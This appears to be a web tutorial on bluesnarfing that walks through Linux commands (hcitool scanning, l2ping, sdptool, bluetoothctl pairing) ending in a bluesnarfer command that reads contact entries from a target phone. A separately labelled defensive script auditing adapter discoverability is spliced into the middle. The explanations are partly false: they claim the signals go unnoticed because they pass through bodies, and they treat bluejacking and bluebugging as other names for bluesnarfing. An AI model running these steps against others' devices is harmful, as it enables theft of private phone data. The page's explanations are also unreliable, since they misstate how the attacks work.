What is Bluesnarfing?

How Does Bluesnarfing Work?

Bluesnarfing works by tricking devices into pairing with each other so that they can exchange information without the owner knowing about it. This happens when two devices are close together and both have Bluetooth turned on: one sends signals over the air while the other receives them.

The problem is that these signals don't just pass through walls; they also pass through our bodies, so people tend not to notice them at all.

How to Bluesnarf?

First we need to prepare our system and create a device node for the serial protocol over Bluetooth (RFCOMM). Bring the Bluetooth interface down and create the RFCOMM device nodes.

Step 1 – Configure RFCOMM communication

hciconfig hci0 down
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0

When you're done, you'll have a new RFCOMM device node on your system. Now we need to bring our interface up again and verify the settings.

hciconfig hci0 up
hciconfig hci0

Step 2 – Scan for Bluetooth Classic devices

Let's scan for nearby devices:

hcitool -i hci0 scan
hcitool inq
systemctl restart bluetooth

Step 3 – Test Bluetooth connectivity

Let's test if we can reach our Bluetooth device using the l2ping tool.

l2ping <MAC>

Step 4 – Read Remote Device Information

sdptool browse --tree --l2cap <MAC>

Step 5 – Pair with the remote device

bluetoothctl agent on
bluetoothctl pair <MAC>

Step 6 – Attack the Bluetooth device

bluesnarfer -r 1-100 ME -C 7 -b <MAC>
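The steps above only work against an adapter that is powered, discoverable and pairable, so the defensive check is to audit exactly those settings. The script below is an added example, not part of the original page: a hypothetical `bt_exposure` function that reads `bluetoothctl show` output and flags each setting that leaves the adapter reachable, run here against constructed sample output rather than a real host.

```shell
#!/bin/sh
# Constructed sample of `bluetoothctl show` output (not captured from a real
# host): an adapter left discoverable with no timeout and pairable.
SAMPLE_EXPOSED='Controller AA:BB:CC:DD:EE:FF (public)
	Powered: yes
	Discoverable: yes
	DiscoverableTimeout: 0x00000000
	Pairable: yes
	Discovering: no'
# The same adapter after hardening (also constructed).
SAMPLE_HARDENED='Controller AA:BB:CC:DD:EE:FF (public)
	Powered: yes
	Discoverable: no
	DiscoverableTimeout: 0x000000b4
	Pairable: no
	Discovering: no'
# bt_exposure (hypothetical name) reads `bluetoothctl show` text on stdin,
# prints one finding per setting that lets a nearby device find and pair with
# the adapter, and returns 1 if anything was found, 0 if the adapter is quiet.
bt_exposure() {
    findings=0
    discoverable=no
    # `read` strips the leading tab/spaces and splits "Key: value" on whitespace
    while read -r key val; do
        case "$key" in
            Discoverable:)
                discoverable=$val
                if [ "$val" = yes ]; then
                    echo "Discoverable: adapter answers inquiry scans (hcitool scan)"
                    findings=$((findings + 1))
                fi ;;
            DiscoverableTimeout:)
                if [ "$discoverable" = yes ] && [ "$((val))" -eq 0 ]; then
                    echo "DiscoverableTimeout 0: discoverable indefinitely, not only while pairing"
                    findings=$((findings + 1))
                fi ;;
            Pairable:)
                if [ "$val" = yes ]; then
                    echo "Pairable: adapter accepts incoming pairing requests (agent permitting)"
                    findings=$((findings + 1))
                fi ;;
        esac
    done
    [ "$findings" -eq 0 ]
}
# Demo on the constructed sample; on a real host: bluetoothctl show | bt_exposure
printf '%s\n' "$SAMPLE_EXPOSED" | bt_exposure || echo "review the findings above"
```

The exposed sample produces three findings; the hardened sample produces none, which is the state to leave the adapter in when it is not actively being paired.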

Bluesnarfing is also known as Bluejacking, Bluebiting, Bluesmacking and Bluebugging, terms which refer to the act of connecting to another user's phone remotely using the phone's Bluetooth function.

It involves gaining remote access by exploiting vulnerabilities in software or hardware that permit remote access via Bluetooth connections between devices (such as smartphones) and computers/laptops.

https://wiki.debian.org/BluetoothUser